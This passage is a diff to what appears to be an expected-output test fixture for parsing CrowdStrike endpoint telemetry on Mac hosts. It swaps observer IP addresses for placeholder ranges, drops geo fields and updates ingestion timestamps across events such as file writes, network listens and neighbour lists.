"{\"event_simpleName\":\"GroupIdentity\",\"GID\":\"242\",\"AuthenticationUuidAsString\":\"ABCDEFAB-CDEF-ABCD-EFAB-CDEF000000F2\",\"ConfigStateHash\":\"3967242894\",\"aip\":\"208.165.30.176\",\"AuthenticationId\":\"1119489580471877843\",\"UserPrincipal\":\"user2@dom1\",\"UserSid\":\"S-1-5-21-3852557355-3178143607-2040168074-1485\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"GroupIdentityMacV2\",\"id\":\"ffffffff-1111-11eb-9dc2-029257dbe83b\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff44564c2f8d76394cb25c31ab\",\"AuthenticationUuid\":\"ABCDEFAB-CDEF-ABCD-EFAB-CDEF000000F2\",\"timestamp\":\"1625677478379\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.150867300Z", + "original": "{\"event_simpleName\":\"GroupIdentity\",\"GID\":\"242\",\"AuthenticationUuidAsString\":\"ABCDEFAB-CDEF-ABCD-EFAB-CDEF000000F2\",\"ConfigStateHash\":\"3967242894\",\"aip\":\"67.43.156.13\",\"AuthenticationId\":\"1119489580471877843\",\"UserPrincipal\":\"user2@dom1\",\"UserSid\":\"S-1-5-21-3852557355-3178143607-2040168074-1485\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"GroupIdentityMacV2\",\"id\":\"ffffffff-1111-11eb-9dc2-029257dbe83b\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff44564c2f8d76394cb25c31ab\",\"AuthenticationUuid\":\"ABCDEFAB-CDEF-ABCD-EFAB-CDEF000000F2\",\"timestamp\":\"1625677478379\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "id": "ffffffff-1111-11eb-9dc2-029257dbe83b", "created": "2021-07-07T17:04:38.379Z" }, @@ -3995,21 +3487,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.165.30.176", - "vendor": "crowdstrike", - "ip": "208.165.30.176", "serial_number": "ffffffff44564c2f8d76394cb25c31ab", + "address": "67.43.156.13", "type": "agent", - "version": "1007.4.0013701.1" + "version": "1007.4.0013701.1", + "vendor": "crowdstrike", + "ip": "67.43.156.13" }, "@timestamp": "2021-07-07T01:50:11.845Z", "file": { @@ -4029,19 +3512,19 @@ }, "related": { "hosts": [ - "208.165.30.176" + "67.43.156.13" ], "hash": [ "c0f50d27fe9fb31e33d1ce6577eeb4d4e17639095ad20575da018d1fcf955198", "3967242894" ], "ip": [ - "208.165.30.176" + "67.43.156.13" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465752900Z", - "original": "{\"event_simpleName\":\"MachOFileWritten\",\"ContextTimeStamp\":\"1625622611.845\",\"ConfigStateHash\":\"3967242894\",\"MachOSubType\":\"3\",\"ContextProcessId\":\"364938429384226082\",\"Size\":\"0\",\"ContextThreadId\":\"0\",\"aip\":\"208.165.30.176\",\"SHA256HashData\":\"c0f50d27fe9fb31e33d1ce6577eeb4d4e17639095ad20575da018d1fcf955198\",\"FileIdentifier\":\"04000001000000000000000000000000ac41270400000000\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"MachOFileWrittenMacV3\",\"id\":\"ffffffff-1111-11eb-9dc2-029257dbe83b\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff44564c2f8d76394cb25c31ab\",\"timestamp\":\"1625677479336\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/private/var/folders/bf/dwpvdj3d1tq00l8fgs5rd7x00000gn/T/.net.example.desktop.ev80yl\"}", + "ingested": "2021-12-09T13:36:11.150873600Z", + "original": "{\"event_simpleName\":\"MachOFileWritten\",\"ContextTimeStamp\":\"1625622611.845\",\"ConfigStateHash\":\"3967242894\",\"MachOSubType\":\"3\",\"ContextProcessId\":\"364938429384226082\",\"Size\":\"0\",\"ContextThreadId\":\"0\",\"aip\":\"67.43.156.13\",\"SHA256HashData\":\"c0f50d27fe9fb31e33d1ce6577eeb4d4e17639095ad20575da018d1fcf955198\",\"FileIdentifier\":\"04000001000000000000000000000000ac41270400000000\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"MachOFileWrittenMacV3\",\"id\":\"ffffffff-1111-11eb-9dc2-029257dbe83b\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff44564c2f8d76394cb25c31ab\",\"timestamp\":\"1625677479336\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/private/var/folders/bf/dwpvdj3d1tq00l8fgs5rd7x00000gn/T/.net.example.desktop.ev80yl\"}", "created": "2021-07-07T17:04:39.336Z", "kind": "event", "action": "MachOFileWritten", @@ -4092,21 +3575,12 @@ "direction": "unknown" }, "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.165.30.176", - "vendor": "crowdstrike", - "ip": "208.165.30.176", "serial_number": "ffffffff44564c2f8d76394cb25c31ab", + "address": "67.43.156.13", "type": "agent", - "version": "1007.4.0013701.1" + "version": "1007.4.0013701.1", + "vendor": "crowdstrike", + "ip": "67.43.156.13" }, "@timestamp": "2021-07-07T01:50:08.014Z", "ecs": { @@ -4114,20 +3588,20 @@ }, "related": { "hosts": [ - "208.165.30.176", + "67.43.156.13", "0:0:0:0:0:0:0:0" ], "hash": [ "3967242894" ], "ip": [ - "208.165.30.176", + "67.43.156.13", "0:0:0:0:0:0:0:0" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465759600Z", - "original": "{\"event_simpleName\":\"NetworkListenIP6\",\"ContextTimeStamp\":\"1625622608.014\",\"LocalAddressIP6\":\"0:0:0:0:0:0:0:0\",\"RemoteAddressIP6\":\"0:0:0:0:0:0:0:0\",\"ConfigStateHash\":\"3967242894\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"364938390018585510\",\"RemotePort\":\"0\",\"aip\":\"208.165.30.176\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"LocalPort\":\"8770\",\"Entitlements\":\"15\",\"name\":\"NetworkListenIP6MacV10\",\"id\":\"ffffffff-1111-11eb-9dc2-029257dbe83b\",\"Protocol\":\"6\",\"EffectiveTransmissionClass\":\"3\",\"aid\":\"ffffffff44564c2f8d76394cb25c31ab\",\"ConnectionDirection\":\"2\",\"InContext\":\"0\",\"timestamp\":\"1625677478929\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.150879900Z", + "original": "{\"event_simpleName\":\"NetworkListenIP6\",\"ContextTimeStamp\":\"1625622608.014\",\"LocalAddressIP6\":\"0:0:0:0:0:0:0:0\",\"RemoteAddressIP6\":\"0:0:0:0:0:0:0:0\",\"ConfigStateHash\":\"3967242894\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"364938390018585510\",\"RemotePort\":\"0\",\"aip\":\"67.43.156.13\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"LocalPort\":\"8770\",\"Entitlements\":\"15\",\"name\":\"NetworkListenIP6MacV10\",\"id\":\"ffffffff-1111-11eb-9dc2-029257dbe83b\",\"Protocol\":\"6\",\"EffectiveTransmissionClass\":\"3\",\"aid\":\"ffffffff44564c2f8d76394cb25c31ab\",\"ConnectionDirection\":\"2\",\"InContext\":\"0\",\"timestamp\":\"1625677478929\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:04:38.929Z", "kind": "event", "action": "NetworkListenIP6", @@ -4152,24 +3626,12 @@ }, { "observer": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-CA", - "city_name": "San Francisco", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "California", - "location": { - "lon": -122.3874, - "lat": 37.7852 - } - }, - "address": "208.87.57.118", - "vendor": "crowdstrike", - "ip": "208.87.57.118", "serial_number": "ffffffff62714a708030d494ca0a7e60", + "address": "67.43.156.14", "type": "agent", - "version": "1007.4.0013701.1" + "version": "1007.4.0013701.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:05:02.693Z", "os": { @@ -4180,18 +3642,18 @@ }, "related": { "hosts": [ - "208.87.57.118" + "67.43.156.14" ], "hash": [ "3090255842" ], "ip": [ - "208.87.57.118" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465766300Z", - "original": "{\"event_simpleName\":\"CurrentSystemTags\",\"ConfigStateHash\":\"3090255842\",\"aip\":\"208.87.57.118\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"SystemTableIndex\":\"0\",\"Entitlements\":\"15\",\"name\":\"CurrentSystemTagsMacV1\",\"id\":\"ffffffff-1111-11eb-b88d-06b7cb0d7bd7\",\"EffectiveTransmissionClass\":\"0\",\"aid\":\"ffffffff62714a708030d494ca0a7e60\",\"Tags\":\"312, 11544872091698, 21990232555653, 21990232555859, 26388279066700, 26388279066703, 26388279066704, 26388279066705, 26388279066708, 26388279066849, 26388279066855, 26388279066948, 26388279066958, 26388279066970, 26388279067150, 26388279067174, 26388279067175, 26405458935929, 26405458935963, 26405458935964, 26405458936063, 26405458936087, 26405458936088, 26405458936130, 26405458936163, 26405458936164, 26405458936166, 26405458936167, 26405458936242, 26405458936306, 26405458936307, 26405458936357, 26405458936510, 26405458936511, 26405458936522, 26405458936523, 26422638805193, 26422638805230, 26422638805244, 26422638805245, 26422638805246, 26439818674539, 26439818674540, 26439818674541, 26439818674542, 26439818674543, 26439818674544, 26439818674614, 26439818674615, 26439818674616, 26439818674617, 26439818674678, 26439818674679, 26439818674680, 26439818674882, 26439818674883, 26439818674884, 26439818674894, 26439818674895, 26439818674896, 26456998543646, 26456998543647, 26456998543648, 26456998543649, 26456998543650, 26456998543651, 26456998543652, 26456998543653, 26456998543654, 26456998543656, 26456998543721, 26456998543722, 26456998543744, 26456998543793, 26456998543811, 26456998543903, 26456998543904, 26456998543950, 26456998543963, 26456998544000, 26456998544045, 26456998544086, 26456998544087, 26456998544115, 30803505447073, 30803505447074, 30803505447075, 30803505447076, 30803505447077, 30803505447078, 30803505447194, 30803505447195, 30803505447196, 30803505447528, 30803505447529, 30803505447530, 30803505447532, 30803505447533, 30803505447534, 30803505447537, 30803505447538, 30803505447539, 30803505447541, 30803505447542, 30803505447543, 30803505447567, 30803505447568, 30803505447569, 30803505447571, 30803505447572, 30803505447573, 30803505447575, 30803505447576, 30803505447577, 30803505447579, 30803505447580, 30803505447581, 30803505447583, 30803505447584\",\"timestamp\":\"1625677502693\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.150886200Z", + "original": "{\"event_simpleName\":\"CurrentSystemTags\",\"ConfigStateHash\":\"3090255842\",\"aip\":\"67.43.156.14\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"SystemTableIndex\":\"0\",\"Entitlements\":\"15\",\"name\":\"CurrentSystemTagsMacV1\",\"id\":\"ffffffff-1111-11eb-b88d-06b7cb0d7bd7\",\"EffectiveTransmissionClass\":\"0\",\"aid\":\"ffffffff62714a708030d494ca0a7e60\",\"Tags\":\"312, 11544872091698, 21990232555653, 21990232555859, 26388279066700, 26388279066703, 26388279066704, 26388279066705, 26388279066708, 26388279066849, 26388279066855, 26388279066948, 26388279066958, 26388279066970, 26388279067150, 26388279067174, 26388279067175, 26405458935929, 26405458935963, 26405458935964, 26405458936063, 26405458936087, 26405458936088, 26405458936130, 26405458936163, 26405458936164, 26405458936166, 26405458936167, 26405458936242, 26405458936306, 26405458936307, 26405458936357, 26405458936510, 26405458936511, 26405458936522, 26405458936523, 26422638805193, 26422638805230, 26422638805244, 26422638805245, 26422638805246, 26439818674539, 26439818674540, 26439818674541, 26439818674542, 26439818674543, 26439818674544, 26439818674614, 26439818674615, 26439818674616, 26439818674617, 26439818674678, 26439818674679, 26439818674680, 26439818674882, 26439818674883, 26439818674884, 26439818674894, 26439818674895, 26439818674896, 26456998543646, 26456998543647, 26456998543648, 26456998543649, 26456998543650, 26456998543651, 26456998543652, 26456998543653, 26456998543654, 26456998543656, 26456998543721, 26456998543722, 26456998543744, 26456998543793, 26456998543811, 26456998543903, 26456998543904, 26456998543950, 26456998543963, 26456998544000, 26456998544045, 26456998544086, 26456998544087, 26456998544115, 30803505447073, 30803505447074, 30803505447075, 30803505447076, 30803505447077, 30803505447078, 30803505447194, 30803505447195, 30803505447196, 30803505447528, 30803505447529, 30803505447530, 30803505447532, 30803505447533, 30803505447534, 30803505447537, 30803505447538, 30803505447539, 30803505447541, 30803505447542, 30803505447543, 30803505447567, 30803505447568, 30803505447569, 30803505447571, 30803505447572, 30803505447573, 30803505447575, 30803505447576, 30803505447577, 30803505447579, 30803505447580, 30803505447581, 30803505447583, 30803505447584\",\"timestamp\":\"1625677502693\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:02.693Z", "kind": "state", "action": "CurrentSystemTags", @@ -4357,21 +3819,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.24.116.10", - "vendor": "crowdstrike", - "ip": "208.24.116.10", "serial_number": "ffffffff28414c2293e35c360213e723", + "address": "67.43.156.14", "type": "agent", - "version": "1007.4.0013701.1" + "version": "1007.4.0013701.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:05:33.027Z", "file": { @@ -4389,19 +3842,19 @@ }, "related": { "hosts": [ - "208.24.116.10" + "67.43.156.14" ], "hash": [ "70a06a11057efb22285a7200a53e5b6bae001fe0a98d4b23d0f6a31ad818a005", "1620585913" ], "ip": [ - "208.24.116.10" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465773100Z", - "original": "{\"event_simpleName\":\"NewExecutableWritten\",\"ContextTimeStamp\":\"1625677533.027\",\"ConfigStateHash\":\"1620585913\",\"ContextProcessId\":\"362208380891022165\",\"Size\":\"596224\",\"ContextThreadId\":\"0\",\"aip\":\"208.24.116.10\",\"SHA256HashData\":\"70a06a11057efb22285a7200a53e5b6bae001fe0a98d4b23d0f6a31ad818a005\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"NewExecutableWrittenMacV2\",\"id\":\"ffffffff-1111-11eb-985c-02152dd35bc1\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff28414c2293e35c360213e723\",\"timestamp\":\"1625677533060\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/private/var/folders/3c/z7j1h7dx3nz3xkl10c1vyxgh0000gp/T/.com.google.Chrome.CVG7Ya/Zoom.app/Contents/MacOS/app_mode_loader\",\"VnodeModificationType\":\"0\"}", + "ingested": "2021-12-09T13:36:11.150892800Z", + "original": "{\"event_simpleName\":\"NewExecutableWritten\",\"ContextTimeStamp\":\"1625677533.027\",\"ConfigStateHash\":\"1620585913\",\"ContextProcessId\":\"362208380891022165\",\"Size\":\"596224\",\"ContextThreadId\":\"0\",\"aip\":\"67.43.156.14\",\"SHA256HashData\":\"70a06a11057efb22285a7200a53e5b6bae001fe0a98d4b23d0f6a31ad818a005\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"NewExecutableWrittenMacV2\",\"id\":\"ffffffff-1111-11eb-985c-02152dd35bc1\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff28414c2293e35c360213e723\",\"timestamp\":\"1625677533060\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/private/var/folders/3c/z7j1h7dx3nz3xkl10c1vyxgh0000gp/T/.com.google.Chrome.CVG7Ya/Zoom.app/Contents/MacOS/app_mode_loader\",\"VnodeModificationType\":\"0\"}", "created": "2021-07-07T17:05:33.060Z", "kind": "event", "action": "NewExecutableWritten", @@ -4434,21 +3887,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.137.65.223", - "vendor": "crowdstrike", - "ip": "208.137.65.223", "serial_number": "fffffffffbea48169985c2c2bae89d1d", + "address": "67.43.156.14", "type": "agent", - "version": "1007.4.0013701.1" + "version": "1007.4.0013701.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:03:48.827Z", "file": { @@ -4463,19 +3907,19 @@ }, "related": { "hosts": [ - "208.137.65.223" + "67.43.156.14" ], "hash": [ "d7b56e2a06304ecd343985a1aaedff2eb32ee1151bba0e152aff97c778b7562a", "3090255842" ], "ip": [ - "208.137.65.223" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465779900Z", - "original": "{\"event_simpleName\":\"LfoUploadDataComplete\",\"LfoUploadFlags\":\"4\",\"AttemptNumber\":\"0\",\"ConfigStateHash\":\"3090255842\",\"SourceFileName\":\"/Users/user5/.rbenv/versions/2.6.5/bin/ruby\",\"Size\":\"3876424\",\"aip\":\"208.137.65.223\",\"SHA256HashData\":\"d7b56e2a06304ecd343985a1aaedff2eb32ee1151bba0e152aff97c778b7562a\",\"UploadId\":\"8023668629276690295\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"LfoUploadDataCompleteMacV3\",\"id\":\"ffffffff-1111-11eb-a2ab-024aafff599f\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"fffffffffbea48169985c2c2bae89d1d\",\"Tags\":\"312, 11544872091698, 21990232555653, 21990232555859, 26388279066700, 26388279066703, 26388279066704, 26388279066705, 26388279066708, 26388279066849, 26388279066855, 26388279066948, 26388279066958, 26388279066970, 26388279067150, 26388279067174, 26388279067175, 26405458935929, 26405458935963, 26405458935964, 26405458936063, 26405458936087, 26405458936088, 26405458936130, 26405458936163, 26405458936164, 26405458936166, 26405458936167, 26405458936242, 26405458936306, 26405458936307, 26405458936357, 26405458936510, 26405458936511, 26405458936522, 26405458936523, 26422638805193, 26422638805230, 26422638805244, 26422638805245, 26422638805246, 26439818674539, 26439818674540, 26439818674541, 26439818674542, 26439818674543, 26439818674544, 26439818674614, 26439818674615, 26439818674616, 26439818674617, 26439818674678, 26439818674679, 26439818674680, 26439818674882, 26439818674883, 26439818674884, 26439818674894, 26439818674895, 26439818674896, 26456998543646, 26456998543647, 26456998543648, 26456998543649, 26456998543650, 26456998543651, 26456998543652, 26456998543653, 26456998543654, 26456998543656, 26456998543721, 26456998543722, 26456998543744, 26456998543793, 26456998543811, 26456998543903, 26456998543904, 26456998543950, 26456998543963, 26456998544000, 26456998544045, 26456998544086, 26456998544087, 26456998544115, 30803505447073, 30803505447074, 30803505447075, 30803505447076, 30803505447077, 30803505447078, 30803505447194, 30803505447195, 30803505447196, 30803505447528, 30803505447529, 30803505447530, 30803505447532, 30803505447533, 30803505447534, 30803505447537, 30803505447538, 30803505447539, 30803505447541, 30803505447542, 30803505447543, 30803505447567, 30803505447568, 30803505447569, 30803505447571, 30803505447572, 30803505447573, 30803505447575, 30803505447576, 30803505447577, 30803505447579, 30803505447580, 30803505447581, 30803505447583, 30803505447584\",\"timestamp\":\"1625677428827\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.150899200Z", + "original": "{\"event_simpleName\":\"LfoUploadDataComplete\",\"LfoUploadFlags\":\"4\",\"AttemptNumber\":\"0\",\"ConfigStateHash\":\"3090255842\",\"SourceFileName\":\"/Users/user5/.rbenv/versions/2.6.5/bin/ruby\",\"Size\":\"3876424\",\"aip\":\"67.43.156.14\",\"SHA256HashData\":\"d7b56e2a06304ecd343985a1aaedff2eb32ee1151bba0e152aff97c778b7562a\",\"UploadId\":\"8023668629276690295\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"LfoUploadDataCompleteMacV3\",\"id\":\"ffffffff-1111-11eb-a2ab-024aafff599f\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"fffffffffbea48169985c2c2bae89d1d\",\"Tags\":\"312, 11544872091698, 21990232555653, 21990232555859, 26388279066700, 26388279066703, 26388279066704, 26388279066705, 26388279066708, 26388279066849, 26388279066855, 26388279066948, 26388279066958, 26388279066970, 26388279067150, 26388279067174, 26388279067175, 26405458935929, 26405458935963, 26405458935964, 26405458936063, 26405458936087, 26405458936088, 26405458936130, 26405458936163, 26405458936164, 26405458936166, 26405458936167, 26405458936242, 26405458936306, 26405458936307, 26405458936357, 26405458936510, 26405458936511, 26405458936522, 26405458936523, 26422638805193, 26422638805230, 26422638805244, 26422638805245, 26422638805246, 26439818674539, 26439818674540, 26439818674541, 26439818674542, 26439818674543, 26439818674544, 26439818674614, 26439818674615, 26439818674616, 26439818674617, 26439818674678, 26439818674679, 26439818674680, 26439818674882, 26439818674883, 26439818674884, 26439818674894, 26439818674895, 26439818674896, 26456998543646, 26456998543647, 26456998543648, 26456998543649, 26456998543650, 26456998543651, 26456998543652, 26456998543653, 26456998543654, 26456998543656, 26456998543721, 26456998543722, 26456998543744, 26456998543793, 26456998543811, 26456998543903, 26456998543904, 26456998543950, 26456998543963, 26456998544000, 26456998544045, 26456998544086, 26456998544087, 26456998544115, 30803505447073, 30803505447074, 30803505447075, 30803505447076, 30803505447077, 30803505447078, 30803505447194, 30803505447195, 30803505447196, 30803505447528, 30803505447529, 30803505447530, 30803505447532, 30803505447533, 30803505447534, 30803505447537, 30803505447538, 30803505447539, 30803505447541, 30803505447542, 30803505447543, 30803505447567, 30803505447568, 30803505447569, 30803505447571, 30803505447572, 30803505447573, 30803505447575, 30803505447576, 30803505447577, 30803505447579, 30803505447580, 30803505447581, 30803505447583, 30803505447584\",\"timestamp\":\"1625677428827\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:03:48.827Z", "kind": "event", "action": "LfoUploadDataComplete", @@ -4622,24 +4066,12 @@ }, { "observer": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-IL", - "city_name": "Chicago", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Illinois", - "location": { - "lon": -87.6589, - "lat": 41.8719 - } - }, - "address": "208.100.38.84", - "vendor": "crowdstrike", - "ip": "208.100.38.84", "serial_number": "ffffffffd452449b8d1eb7d85b146650", + "address": "67.43.156.14", "type": "agent", - "version": "1007.4.0013701.1" + "version": "1007.4.0013701.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:04:13.146Z", "os": { @@ -4650,19 +4082,19 @@ }, "related": { "hosts": [ - "208.100.38.84" + "67.43.156.14" ], "hash": [ "3090255842" ], "ip": [ - "208.100.38.84" + "67.43.156.14" ] }, "event": { "action": "LightningLatencyInfo", - "ingested": "2021-11-22T09:23:55.465786600Z", - "original": "{\"event_simpleName\":\"LightningLatencyInfo\",\"LightningLatencyState\":\"3\",\"ConfigStateHash\":\"3090255842\",\"aip\":\"208.100.38.84\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"LightningLatencyInfoMacV1\",\"id\":\"ffffffff-1111-11eb-b44e-069a02b0ad6b\",\"EffectiveTransmissionClass\":\"0\",\"aid\":\"ffffffffd452449b8d1eb7d85b146650\",\"timestamp\":\"1625677453146\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.150905600Z", + "original": "{\"event_simpleName\":\"LightningLatencyInfo\",\"LightningLatencyState\":\"3\",\"ConfigStateHash\":\"3090255842\",\"aip\":\"67.43.156.14\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"LightningLatencyInfoMacV1\",\"id\":\"ffffffff-1111-11eb-b44e-069a02b0ad6b\",\"EffectiveTransmissionClass\":\"0\",\"aid\":\"ffffffffd452449b8d1eb7d85b146650\",\"timestamp\":\"1625677453146\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "id": "ffffffff-1111-11eb-b44e-069a02b0ad6b", "created": "2021-07-07T17:04:13.146Z" }, @@ -4683,21 +4115,12 @@ }, { "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.93.56.66", - "vendor": "crowdstrike", - "ip": "208.93.56.66", "serial_number": "ffffffff8eb649cf8d82be1e65629a0e", + "address": "67.43.156.14", "type": "agent", - "version": "1007.4.0013701.1" + "version": "1007.4.0013701.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:04:10.083Z", "os": { @@ -4708,18 +4131,18 @@ }, "related": { "hosts": [ - "208.93.56.66" + "67.43.156.14" ], "hash": [ "1620585913" ], "ip": [ - "208.93.56.66" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465793300Z", - "original": "{\"event_simpleName\":\"NeighborListIP4\",\"ConfigStateHash\":\"1620585913\",\"NeighborList\":\"40-C7-29-FF-FF-FF|192.168.2.1|1|64-9A-BE-FF-FF-FF|192.168.2.10|0|F0-FF-FF-FF-A0-14|192.168.2.43|0|DE-58-FF-FF-5D-3B|192.168.2.113|0|5E-AA-FF-FF-FF-20|192.168.2.128|0|44-FF-FF-FF-03-DD|192.168.2.136|0|EE-74-EE-EE-FF-0D|192.168.2.137|0|3A-FF-FF-FF-03-26|192.168.2.144|0|DE-79-FF-FF-FF-D4|192.168.2.145|0|0E-24-FF-EE-EE-87|192.168.2.152|0|CC-D9-AC-AF-66-F8|192.168.2.153|0|\",\"aip\":\"208.93.56.66\",\"InterfaceIndex\":\"6\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"NeighborListIP4MacV1\",\"id\":\"ffffffff-1111-11eb-9dc0-06c6f5278873\",\"EffectiveTransmissionClass\":\"3\",\"aid\":\"ffffffff8eb649cf8d82be1e65629a0e\",\"timestamp\":\"1625677450083\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.150911900Z", + "original": "{\"event_simpleName\":\"NeighborListIP4\",\"ConfigStateHash\":\"1620585913\",\"NeighborList\":\"40-C7-29-FF-FF-FF|192.168.2.1|1|64-9A-BE-FF-FF-FF|192.168.2.10|0|F0-FF-FF-FF-A0-14|192.168.2.43|0|DE-58-FF-FF-5D-3B|192.168.2.113|0|5E-AA-FF-FF-FF-20|192.168.2.128|0|44-FF-FF-FF-03-DD|192.168.2.136|0|EE-74-EE-EE-FF-0D|192.168.2.137|0|3A-FF-FF-FF-03-26|192.168.2.144|0|DE-79-FF-FF-FF-D4|192.168.2.145|0|0E-24-FF-EE-EE-87|192.168.2.152|0|CC-D9-AC-AF-66-F8|192.168.2.153|0|\",\"aip\":\"67.43.156.14\",\"InterfaceIndex\":\"6\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"NeighborListIP4MacV1\",\"id\":\"ffffffff-1111-11eb-9dc0-06c6f5278873\",\"EffectiveTransmissionClass\":\"3\",\"aid\":\"ffffffff8eb649cf8d82be1e65629a0e\",\"timestamp\":\"1625677450083\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:04:10.083Z", "kind": "state", "action": "NeighborListIP4", @@ -4800,24 +4223,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-AR", - "city_name": "Little Rock", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Arkansas", - "location": { - "lon": -92.3565, - "lat": 34.7721 - } - }, - "address": "208.70.175.112", - "vendor": "crowdstrike", - "ip": "208.70.175.112", "serial_number": "ffffffff2d984e32b702789b54f0f811", + "address": "67.43.156.14", "type": "agent", - "version": "1007.4.0013701.1" + "version": "1007.4.0013701.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:04:14.557Z", "file": { @@ -4833,18 +4244,18 @@ }, "related": { "hosts": [ - "208.70.175.112" + "67.43.156.14" ], "hash": [ "3090255842" ], "ip": [ - "208.70.175.112" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465800Z", - "original": 